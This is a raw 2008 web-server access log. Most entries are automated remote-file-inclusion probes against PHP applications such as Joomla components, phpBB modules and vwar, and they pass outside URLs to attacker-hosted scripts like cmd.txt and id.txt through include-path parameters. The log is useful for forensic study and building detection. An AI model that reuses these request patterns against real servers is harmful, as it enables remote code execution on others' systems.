209.160.72.103 - - [26/Jan/2008:09:50:05 -0800] "GET /logs/access_080106.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:09:50:06 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:09:50:06 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:50:56 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:50:56 -0800] "GET //?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:50:57 -0800] "GET /logs//?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 200 32488 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.174.136 - - [26/Jan/2008:09:51:00 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:09:51:27 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:09:51:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:09:51:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.39 - - [26/Jan/2008:09:52:00 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.67.27.39 - - [26/Jan/2008:09:52:00 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:09:52:13 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:09:52:23 -0800] "GET /logs/impex/ImpExData.php?systempath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:09:52:23 -0800] "GET /impex/ImpExData.php?systempath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:09:52:29 -0800] "GET /logs/impex/ImpExData.php?systempath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:09:52:30 -0800] "GET /impex/ImpExData.php?systempath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:54:00 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:54:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:54:01 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:55:14 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:55:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:55:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:56:00 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:56:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:56:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:09:56:49 -0800] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:09:57:46 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:59:35 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [26/Jan/2008:10:00:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:10:00:50 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:10:01:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:02:13 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:02:13 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:10:02:20 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:04:03 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:04:04 -0800] "GET //?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:04:04 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 200 32488 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:10:04:35 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:10:04:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:04:40 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:05:07 -0800] "GET /logs/access_071229.log/lib/gore.php?libpath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:05:07 -0800] "GET /lib/gore.php?libpath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:05:07 -0800] "GET /logs/lib/gore.php?libpath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.4.20.46 - - [26/Jan/2008:10:08:03 -0800] "GET /index.php?body=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:10:09:31 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:10:09:31 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:10:09:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:43 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:10:09:45 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:10:09:47 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:48 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:10:09:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:49 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:49 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:49 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:49 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:49 -0800] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:50 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:50 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:50 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:51 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:51 -0800] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:10:09:53 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ls8-projekt.de/cache/com_sef/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:01 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:02 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:02 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:04 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:05 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:05 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:06 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:06 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:06 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:12 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.173.252.10 - - [26/Jan/2008:10:10:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:16 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:17 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:17 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:17 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:17 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:10:10:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:10:10:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:10:48 -0800] "GET /logs/access_071225.log/index.php?body=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:10:48 -0800] "GET /logs/index.php?body=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.110 - - [26/Jan/2008:10:12:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.148 - - [26/Jan/2008:10:12:06 -0800] "GET /logs/access_071003.log HTTP/1.0" 200 36511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:12:58 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:12:59 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33140 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
